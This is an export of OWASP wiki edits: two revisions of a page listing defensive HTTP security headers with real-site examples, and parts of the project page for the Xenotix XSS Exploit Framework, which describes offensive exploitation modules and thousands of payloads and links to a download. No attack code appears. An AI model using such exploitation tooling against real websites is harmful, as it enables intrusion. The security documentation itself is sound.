* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]	&lt;br /&gt;
&lt;br /&gt;
= Goodies =		&lt;br /&gt;
== Xenotix Hoodies ==&lt;br /&gt;
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=List_of_useful_HTTP_headers&amp;diff=194916</id>
		<title>List of useful HTTP headers</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=List_of_useful_HTTP_headers&amp;diff=194916"/>
				<updated>2015-05-16T09:06:40Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: rfc name correction&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists useful security-related HTTP headers. In most architectures these headers can be set in web server configuration ([http://httpd.apache.org/docs/2.2/mod/mod_headers.html Apache], [http://technet.microsoft.com/pl-pl/library/cc753133(v=ws.10).aspx IIS], [http://nginx.org/en/docs/http/ngx_http_headers_module.html nginx]), without changing actual application's code. This offers significantly faster and cheaper method for at least partial mitigation of existing issues, and an additional layer of defense for new applications.&lt;br /&gt;
&lt;br /&gt;
{| border=&amp;quot;1&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Header name&lt;br /&gt;
! Description&lt;br /&gt;
! Example&lt;br /&gt;
|-&lt;br /&gt;
|[https://developer.mozilla.org/en-US/docs/Web/Security/Public_Key_Pinning Public Key Pinning Extension for HTTP]&lt;br /&gt;
|The Public Key Pinning Extension for HTTP (HPKP) is a security header that tells a web client to associate a specific cryptographic public key with a certain web server to prevent MITM attacks with forged certificates.&lt;br /&gt;
|&amp;lt;code&amp;gt;Public-Key-Pins: pin-sha256=&amp;quot;&amp;lt;sha256&amp;gt;&amp;quot;; pin-sha256=&amp;quot;&amp;lt;sha256&amp;gt;&amp;quot;; max-age=15768000; includeSubDomains &amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|[http://tools.ietf.org/html/rfc6797 Strict-Transport-Security]&lt;br /&gt;
|HTTP Strict-Transport-Security (HSTS) enforces secure (HTTP over SSL/TLS) connections to the server. This reduces impact of bugs in web applications leaking session data through cookies and external links and defends against Man-in-the-middle attacks. HSTS also disables the ability for user's to ignore SSL negotiation warnings.&lt;br /&gt;
|&amp;lt;code&amp;gt;Strict-Transport-Security: max-age=16070400; includeSubDomains&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://tools.ietf.org/html/draft-ietf-websec-x-frame-options-01 X-Frame-Options], [http://tools.ietf.org/html/draft-ietf-websec-frame-options-00 Frame-Options]&lt;br /&gt;
| Provides [[Clickjacking]] protection. Values: ''deny'' - no rendering within a frame, ''sameorigin'' - no rendering if origin mismatch, ''allow-from: DOMAIN'' - allow rendering if framed by frame loaded from ''DOMAIN''&lt;br /&gt;
| &amp;lt;code&amp;gt; X-Frame-Options: deny&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-iv-the-xss-filter.aspx X-XSS-Protection]&lt;br /&gt;
| This header enables the [[Cross-site scripting]] (XSS) filter built into most recent web browsers. It's usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user. This header is supported in IE 8+, and in Chrome (not sure which versions). The anti-XSS filter was added in Chrome 4. Its unknown if that version honored this header.&lt;br /&gt;
| &amp;lt;code&amp;gt;X-XSS-Protection: 1; mode=block&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://blogs.msdn.com/b/ie/archive/2008/09/02/ie8-security-part-vi-beta-2-update.aspx X-Content-Type-Options]&lt;br /&gt;
| The only defined value, &amp;quot;nosniff&amp;quot;, prevents Internet Explorer and Google Chrome from MIME-sniffing a response away from the declared content-type. This also applies to [http://code.google.com/chrome/extensions/hosting.html Google Chrome], when downloading extensions. This reduces exposure to drive-by download attacks and sites serving user uploaded content that, by clever naming, could be treated by MSIE as executable or dynamic HTML files.&lt;br /&gt;
| &amp;lt;code&amp;gt; X-Content-Type-Options: nosniff &amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|[http://www.w3.org/TR/CSP/ Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP]&lt;br /&gt;
|[[Content Security Policy]] requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including [[Cross-site scripting]] and other cross-site injections.&lt;br /&gt;
|&amp;lt;code&amp;gt;Content-Security-Policy: default-src 'self'&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://www.w3.org/TR/CSP/ Content-Security-Policy-Report-Only]&lt;br /&gt;
| Like Content-Security-Policy, but only reports.  Useful during implementation, tuning and testing efforts.&lt;br /&gt;
| &amp;lt;code&amp;gt;Content-Security-Policy-Report-Only: default-src 'self'; report-uri http://loghost.example.com/reports.jsp&amp;lt;/code&amp;gt;&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Check Your Headers==&lt;br /&gt;
&lt;br /&gt;
Visit Check Your Headers to view and evaluate any website's security headers.  http://cyh.herokuapp.com/cyh&lt;br /&gt;
&lt;br /&gt;
For Chrome, the Recx Security Analyser extension checks a number of security relevant headers and gives a nice report on the findings.&lt;br /&gt;
[https://chrome.google.com/webstore/detail/recx-security-analyser/ljafjhbjenhgcgnikniijchkngljgjda Recx Security Analyser]&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
==Real life examples==&lt;br /&gt;
Below examples present selected HTTP headers as set by popular websites to demonstrate that they are indeed being used in production services:&lt;br /&gt;
&lt;br /&gt;
===Facebook===&lt;br /&gt;
As of January 2013 [https://www.facebook.com/ Facebook] main page was setting these security related HTTP headers. &lt;br /&gt;
&lt;br /&gt;
 '''Strict-Transport-Security:''' max-age=60&lt;br /&gt;
 '''X-Content-Type-Options:''' nosniff&lt;br /&gt;
 '''X-Frame-Options:''' DENY&lt;br /&gt;
 '''X-WebKit-CSP:''' &amp;lt;small&amp;gt;&amp;lt;nowiki&amp;gt;default-src *; script-src https://*.facebook.com&lt;br /&gt;
   http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net&lt;br /&gt;
   *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:*&lt;br /&gt;
   'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net;&lt;br /&gt;
   style-src * 'unsafe-inline'; connect-src https://*.facebook.com http://*.facebook.com&lt;br /&gt;
   https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:*&lt;br /&gt;
   https://*.akamaihd.net ws://*.facebook.com:* http://*.akamaihd.net;&amp;lt;/nowiki&amp;gt;&amp;lt;/small&amp;gt;&lt;br /&gt;
 '''X-XSS-Protection:''' 1; mode=block&lt;br /&gt;
&lt;br /&gt;
Especially interesting is Facebook's use of [http://www.w3.org/TR/CSP/ Content Security Policy] (using Google Chrome syntax), whose implementation can be [http://www.html5rocks.com/en/tutorials/security/content-security-policy/ challenging] for large sites with heavy usage of JavaScript.&lt;br /&gt;
&lt;br /&gt;
As of July 2014, the following headers were set:&lt;br /&gt;
&lt;br /&gt;
 '''strict-transport-security: max-age=7776000'''&lt;br /&gt;
 '''x-content-type-options: nosniff'''&lt;br /&gt;
 '''x-frame-options: DENY'''&lt;br /&gt;
 '''content-security-policy: &amp;lt;small&amp;gt;&amp;lt;nowiki&amp;gt; default-src *;script-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net&lt;br /&gt;
*.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net &lt;br /&gt;
*.atlassolutions.com chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl;style-src * 'unsafe-inline';connect-src https://*.facebook.com http://*.facebook.com &lt;br /&gt;
https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:* https://*.akamaihd.net wss://*.facebook.com:* ws://*.facebook.com:* http://*.akamaihd.net&lt;br /&gt;
https://fb.scanandcleanlocal.com:* *.atlassolutions.com http://attachment.fbsbx.com https://attachment.fbsbx.com;&amp;lt;/nowiki&amp;gt;&amp;lt;/small&amp;gt;'''&lt;br /&gt;
 '''x-xss-protection:0'''&lt;br /&gt;
&lt;br /&gt;
===Google+===&lt;br /&gt;
As of January 2013 [https://plus.google.com/ Google+] main page was setting these security related HTTP headers:&lt;br /&gt;
&lt;br /&gt;
 '''x-content-type-options:''' nosniff&lt;br /&gt;
 '''x-frame-options:''' SAMEORIGIN&lt;br /&gt;
 '''x-xss-protection:''' 1; mode=block&lt;br /&gt;
&lt;br /&gt;
===Twitter===&lt;br /&gt;
As of May 2013 [https://twitter.com/ Twitter] main page was setting these security related HTTP headers:&lt;br /&gt;
&lt;br /&gt;
 '''strict-transport-security:''' max-age=631138519&lt;br /&gt;
 '''x-frame-options:''' SAMEORIGIN&lt;br /&gt;
 '''x-xss-protection:''' 1; mode=block&lt;br /&gt;
&lt;br /&gt;
As of July 2014 we can see the implementation of CSP added:&lt;br /&gt;
 '''&amp;lt;nowiki&amp;gt;content-security-policy-report-only: default-src https:; connect-src https:; font-src https: data:; frame-src https: &lt;br /&gt;
http://*.twimg.com http://itunes.apple.com about: javascript:; img-src https: data:; media-src https:; object-src https:; &lt;br /&gt;
script-src 'unsafe-inline' 'unsafe-eval' about: https:; style-src 'unsafe-inline' https:; report-uri &lt;br /&gt;
https://twitter.com/i/csp_report?a=NVQWGBBBFVZXO2LAAA%3D%3D%3D%3D%3D%3D&amp;amp;ro=true;&amp;lt;/nowiki&amp;gt;'''&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=List_of_useful_HTTP_headers&amp;diff=194705</id>
		<title>List of useful HTTP headers</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=List_of_useful_HTTP_headers&amp;diff=194705"/>
				<updated>2015-05-11T07:37:53Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: added HPKP&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists useful security-related HTTP headers. In most architectures these headers can be set in web server configuration ([http://httpd.apache.org/docs/2.2/mod/mod_headers.html Apache], [http://technet.microsoft.com/pl-pl/library/cc753133(v=ws.10).aspx IIS], [http://nginx.org/en/docs/http/ngx_http_headers_module.html nginx]), without changing actual application's code. This offers significantly faster and cheaper method for at least partial mitigation of existing issues, and an additional layer of defense for new applications.&lt;br /&gt;
&lt;br /&gt;
{| border=&amp;quot;1&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Header name&lt;br /&gt;
! Description&lt;br /&gt;
! Example&lt;br /&gt;
|-&lt;br /&gt;
|[https://developer.mozilla.org/en-US/docs/Web/Security/Public_Key_Pinning HTTP Public Key Pinning]&lt;br /&gt;
|The HTTP Public Key Pinning (HPKP) is a security header that tells a web client to associate a specific cryptographic public key with a certain web server to prevent MITM attacks with forged certificates.&lt;br /&gt;
|&amp;lt;code&amp;gt;Public-Key-Pins: pin-sha256=&amp;quot;&amp;lt;sha256&amp;gt;&amp;quot;; pin-sha256=&amp;quot;&amp;lt;sha256&amp;gt;&amp;quot;; max-age=15768000; includeSubDomains &amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|[http://tools.ietf.org/html/rfc6797 Strict-Transport-Security]&lt;br /&gt;
|HTTP Strict-Transport-Security (HSTS) enforces secure (HTTP over SSL/TLS) connections to the server. This reduces impact of bugs in web applications leaking session data through cookies and external links and defends against Man-in-the-middle attacks. HSTS also disables the ability for user's to ignore SSL negotiation warnings.&lt;br /&gt;
|&amp;lt;code&amp;gt;Strict-Transport-Security: max-age=16070400; includeSubDomains&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://tools.ietf.org/html/draft-ietf-websec-x-frame-options-01 X-Frame-Options], [http://tools.ietf.org/html/draft-ietf-websec-frame-options-00 Frame-Options]&lt;br /&gt;
| Provides [[Clickjacking]] protection. Values: ''deny'' - no rendering within a frame, ''sameorigin'' - no rendering if origin mismatch, ''allow-from: DOMAIN'' - allow rendering if framed by frame loaded from ''DOMAIN''&lt;br /&gt;
| &amp;lt;code&amp;gt; X-Frame-Options: deny&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-iv-the-xss-filter.aspx X-XSS-Protection]&lt;br /&gt;
| This header enables the [[Cross-site scripting]] (XSS) filter built into most recent web browsers. It's usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user. This header is supported in IE 8+, and in Chrome (not sure which versions). The anti-XSS filter was added in Chrome 4. Its unknown if that version honored this header.&lt;br /&gt;
| &amp;lt;code&amp;gt;X-XSS-Protection: 1; mode=block&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://blogs.msdn.com/b/ie/archive/2008/09/02/ie8-security-part-vi-beta-2-update.aspx X-Content-Type-Options]&lt;br /&gt;
| The only defined value, &amp;quot;nosniff&amp;quot;, prevents Internet Explorer and Google Chrome from MIME-sniffing a response away from the declared content-type. This also applies to [http://code.google.com/chrome/extensions/hosting.html Google Chrome], when downloading extensions. This reduces exposure to drive-by download attacks and sites serving user uploaded content that, by clever naming, could be treated by MSIE as executable or dynamic HTML files.&lt;br /&gt;
| &amp;lt;code&amp;gt; X-Content-Type-Options: nosniff &amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|[http://www.w3.org/TR/CSP/ Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP]&lt;br /&gt;
|[[Content Security Policy]] requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including [[Cross-site scripting]] and other cross-site injections.&lt;br /&gt;
|&amp;lt;code&amp;gt;Content-Security-Policy: default-src 'self'&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://www.w3.org/TR/CSP/ Content-Security-Policy-Report-Only]&lt;br /&gt;
| Like Content-Security-Policy, but only reports.  Useful during implementation, tuning and testing efforts.&lt;br /&gt;
| &amp;lt;code&amp;gt;Content-Security-Policy-Report-Only: default-src 'self'; report-uri http://loghost.example.com/reports.jsp&amp;lt;/code&amp;gt;&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Check Your Headers==&lt;br /&gt;
&lt;br /&gt;
Visit Check Your Headers to view and evaluate any website's security headers.  http://cyh.herokuapp.com/cyh&lt;br /&gt;
&lt;br /&gt;
For Chrome, the Recx Security Analyser extension checks a number of security relevant headers and gives a nice report on the findings.&lt;br /&gt;
[https://chrome.google.com/webstore/detail/recx-security-analyser/ljafjhbjenhgcgnikniijchkngljgjda Recx Security Analyser]&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
==Real life examples==&lt;br /&gt;
Below examples present selected HTTP headers as set by popular websites to demonstrate that they are indeed being used in production services:&lt;br /&gt;
&lt;br /&gt;
===Facebook===&lt;br /&gt;
As of January 2013 [https://www.facebook.com/ Facebook] main page was setting these security related HTTP headers. &lt;br /&gt;
&lt;br /&gt;
 '''Strict-Transport-Security:''' max-age=60&lt;br /&gt;
 '''X-Content-Type-Options:''' nosniff&lt;br /&gt;
 '''X-Frame-Options:''' DENY&lt;br /&gt;
 '''X-WebKit-CSP:''' &amp;lt;small&amp;gt;&amp;lt;nowiki&amp;gt;default-src *; script-src https://*.facebook.com&lt;br /&gt;
   http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net&lt;br /&gt;
   *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:*&lt;br /&gt;
   'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net;&lt;br /&gt;
   style-src * 'unsafe-inline'; connect-src https://*.facebook.com http://*.facebook.com&lt;br /&gt;
   https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:*&lt;br /&gt;
   https://*.akamaihd.net ws://*.facebook.com:* http://*.akamaihd.net;&amp;lt;/nowiki&amp;gt;&amp;lt;/small&amp;gt;&lt;br /&gt;
 '''X-XSS-Protection:''' 1; mode=block&lt;br /&gt;
&lt;br /&gt;
Especially interesting is Facebook's use of [http://www.w3.org/TR/CSP/ Content Security Policy] (using Google Chrome syntax), whose implementation can be [http://www.html5rocks.com/en/tutorials/security/content-security-policy/ challenging] for large sites with heavy usage of JavaScript.&lt;br /&gt;
&lt;br /&gt;
As of July 2014, the following headers were set:&lt;br /&gt;
&lt;br /&gt;
 '''strict-transport-security: max-age=7776000'''&lt;br /&gt;
 '''x-content-type-options: nosniff'''&lt;br /&gt;
 '''x-frame-options: DENY'''&lt;br /&gt;
 '''content-security-policy: &amp;lt;small&amp;gt;&amp;lt;nowiki&amp;gt; default-src *;script-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net&lt;br /&gt;
*.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net &lt;br /&gt;
*.atlassolutions.com chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl;style-src * 'unsafe-inline';connect-src https://*.facebook.com http://*.facebook.com &lt;br /&gt;
https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:* https://*.akamaihd.net wss://*.facebook.com:* ws://*.facebook.com:* http://*.akamaihd.net&lt;br /&gt;
https://fb.scanandcleanlocal.com:* *.atlassolutions.com http://attachment.fbsbx.com https://attachment.fbsbx.com;&amp;lt;/nowiki&amp;gt;&amp;lt;/small&amp;gt;'''&lt;br /&gt;
 '''x-xss-protection:0'''&lt;br /&gt;
&lt;br /&gt;
===Google+===&lt;br /&gt;
As of January 2013 [https://plus.google.com/ Google+] main page was setting these security related HTTP headers:&lt;br /&gt;
&lt;br /&gt;
 '''x-content-type-options:''' nosniff&lt;br /&gt;
 '''x-frame-options:''' SAMEORIGIN&lt;br /&gt;
 '''x-xss-protection:''' 1; mode=block&lt;br /&gt;
&lt;br /&gt;
===Twitter===&lt;br /&gt;
As of May 2013 [https://twitter.com/ Twitter] main page was setting these security related HTTP headers:&lt;br /&gt;
&lt;br /&gt;
 '''strict-transport-security:''' max-age=631138519&lt;br /&gt;
 '''x-frame-options:''' SAMEORIGIN&lt;br /&gt;
 '''x-xss-protection:''' 1; mode=block&lt;br /&gt;
&lt;br /&gt;
As of July 2014 we can see the implementation of CSP added:&lt;br /&gt;
 '''&amp;lt;nowiki&amp;gt;content-security-policy-report-only: default-src https:; connect-src https:; font-src https: data:; frame-src https: &lt;br /&gt;
http://*.twimg.com http://itunes.apple.com about: javascript:; img-src https: data:; media-src https:; object-src https:; &lt;br /&gt;
script-src 'unsafe-inline' 'unsafe-eval' about: https:; style-src 'unsafe-inline' https:; report-uri &lt;br /&gt;
https://twitter.com/i/csp_report?a=NVQWGBBBFVZXO2LAAA%3D%3D%3D%3D%3D%3D&amp;amp;ro=true;&amp;lt;/nowiki&amp;gt;'''&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=188279</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=188279"/>
				<updated>2015-01-20T08:26:02Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
== PROJECT WEBSITE ==&lt;br /&gt;
&lt;br /&gt;
*http://xenotix.in&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch2014.png |180px | thumb | left |link=http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2014]]&lt;br /&gt;
[[Image:ToolsWatch2013.png |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Jan 2015] [http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2014, voted by ToolsWatch Readers]&lt;br /&gt;
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
